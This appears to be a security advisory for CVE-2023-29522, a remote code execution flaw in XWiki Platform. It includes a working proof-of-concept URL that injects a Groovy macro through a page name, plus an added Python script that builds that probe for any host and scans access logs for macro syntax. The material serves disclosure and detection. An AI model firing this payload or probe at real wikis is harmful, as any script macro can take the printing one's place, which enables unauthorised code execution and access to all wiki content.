PT-2023-8611 · Xwiki · Xwiki Platform

Michael Hamann

·

Published

2023-04-18

·

Updated

2023-04-28

·

CVE-2023-29522

CVSS v3.1

9.9

Critical

Vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
Name of the Vulnerable Software and Affected Versions

XWiki Platform versions prior to 14.4.8
XWiki Platform versions prior to 14.10.3
XWiki Platform versions prior to 15.0RC1

Description

Any user with view rights can execute arbitrary script macros, including Groovy and Python macros, which leads to remote code execution and to unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page whose name carries the payload while the XWiki.ClassSheet sheet is selected for rendering (?sheet=XWiki.ClassSheet&xpage=view). For instance, opening

<xwiki-host>/xwiki/bin/view/%22%2F%7D%7D%7B%7B%2Fhtml%7D%7D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=XWiki.ClassSheet&xpage=view

where <xwiki-host> is the URL of the XWiki installation, executes the embedded Groovy macro. URL-decoded, the requested page name is

"/}}{{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}

The leading "/}}{{/html}} closes the {{html}} macro the sheet wraps the page name in; everything after it is parsed as wiki syntax, so the {{groovy}} macro runs and the rendered page contains "Hello from groovy!" even though the requesting user only has view rights. Any other script macro can be placed at the same position.

Recommendations

Upgrade to a fixed release: XWiki 14.4.8 or later for versions prior to 14.4.8, XWiki 14.10.3 or later for versions prior to 14.10.3, or XWiki 15.0RC1 or later for versions prior to 15.0RC1. As a temporary workaround until the patch is applied, restrict access to the groovy and python macros, and to any other script macro enabled on the wiki, since the injection point accepts arbitrary script macros. Note that this limits who can execute scripts but does not remove the injection of wiki syntax through the page name.
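The following is an added example for this advisory; it is not code from the advisory or from XWiki. It rebuilds the crafted URL from its decoded page name for an arbitrary host, checks a response body for the string the Groovy macro prints, and flags exploitation attempts of this kind in web-server access logs by looking for script-macro syntax in the page-name part of /bin/view/ requests. The host wiki.example, the log lines and the function names are constructed for the example.

```python
"""Added example for CVE-2023-29522 (not code from the advisory or from XWiki).
Builds the probe URL, checks a response for the Groovy marker, and flags
exploitation attempts in access logs. wiki.example and the log lines are
constructed."""
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# The page name from the advisory's URL, percent-decoded. The leading
# "/}}{{/html}} closes the {{html}} macro the sheet wraps the name in, so the
# rest is parsed as wiki syntax and the {{groovy}} macro runs.
PAYLOAD_PAGE_NAME = (
    '"/}}{{/html}} '
    '{{async async="true" cached="false" context="doc.reference"}}'
    '{{groovy}}println("Hello " + "from groovy!"){{/groovy}}'
    '{{/async}}'
)
MARKER = "Hello from groovy!"  # what the Groovy macro prints if it executed

# Path and query exactly as printed in the advisory; the host is constructed.
ADVISORY_URL = (
    "https://wiki.example/xwiki/bin/view/"
    "%22%2F%7D%7D%7B%7B%2Fhtml%7D%7D%20%7B%7Basync%20async%3D%22true%22%20cached"
    "%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7D"
    "println(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D"
    "%7B%7B%2Fasync%7D%7D?sheet=XWiki.ClassSheet&xpage=view"
)


def probe_url(base_url: str, page_name: str = PAYLOAD_PAGE_NAME) -> str:
    """Build the advisory's URL for another host. quote(..., safe="") also
    encodes '(', ')' and '!', which the advisory left raw; both decode alike."""
    return (f"{base_url.rstrip('/')}/xwiki/bin/view/{quote(page_name, safe='')}"
            "?sheet=XWiki.ClassSheet&xpage=view")


def executed(response_body: str) -> bool:
    """True if the rendered page contains the string the Groovy macro prints."""
    return MARKER in response_body


def _decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so double-encoded names are seen."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


# Opening or closing tag of the macros relevant to this bug, e.g. {{groovy}} or {{/html}}.
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|python|async|html|velocity|script)\b", re.I)
# Request line inside a Common Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_target(target: str) -> dict:
    """Decode a request target (path?query or full URL); report the page-name
    part after /bin/view/, the macro names found in it, and the sheet selected."""
    parts = urlsplit(target)
    path = _decode(parts.path)
    page_name = path.split("/bin/view/", 1)[1] if "/bin/view/" in path else ""
    macros = sorted({m.lower() for m in MACRO_RE.findall(page_name)})
    sheet = parse_qs(_decode(parts.query)).get("sheet", [None])[0]
    return {"page_name": page_name, "macros": macros, "sheet": sheet}


def page_name_from_url(url: str) -> str:
    return inspect_target(url)["page_name"]


def scan_log(lines) -> list:
    """Flag every /bin/view/ request whose page name carries script-macro
    syntax. A ?sheet= parameter alone is normal traffic and is not flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        info = inspect_target(m.group("target"))
        if info["macros"]:
            hits.append({"line": n, "target": m.group("target"), **info})
    return hits


# Constructed access-log sample: a normal view, the advisory's request, and a
# benign request that merely passes the sheet parameter.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [18/Apr/2023:10:01:02 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5123',
    '203.0.113.7 - - [18/Apr/2023:10:01:09 +0000] "GET '
    + ADVISORY_URL.split("wiki.example", 1)[1] + ' HTTP/1.1" 200 9876',
    '198.51.100.4 - - [18/Apr/2023:10:02:30 +0000] "GET /xwiki/bin/view/XWiki/ClassSheet?sheet=XWiki.ClassSheet&xpage=view HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: macros={hit['macros']} sheet={hit['sheet']}")
    print(probe_url("https://wiki.example"))
```

The detection keys on macro syntax in the page-name segment rather than on the sheet parameter: sheets are requested legitimately, whereas a page name that opens or closes a script macro has no benign use. Decoding is repeated a bounded number of times so that a double-encoded name does not slip past the pattern.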

Exploit

Fix

RCE

Special Elements Injection


Weakness Enumeration

Related Identifiers

BDU:2024-01264
CVE-2023-29522
GHSA-MJW9-3F9F-JQ2W

Affected Products

Xwiki Platform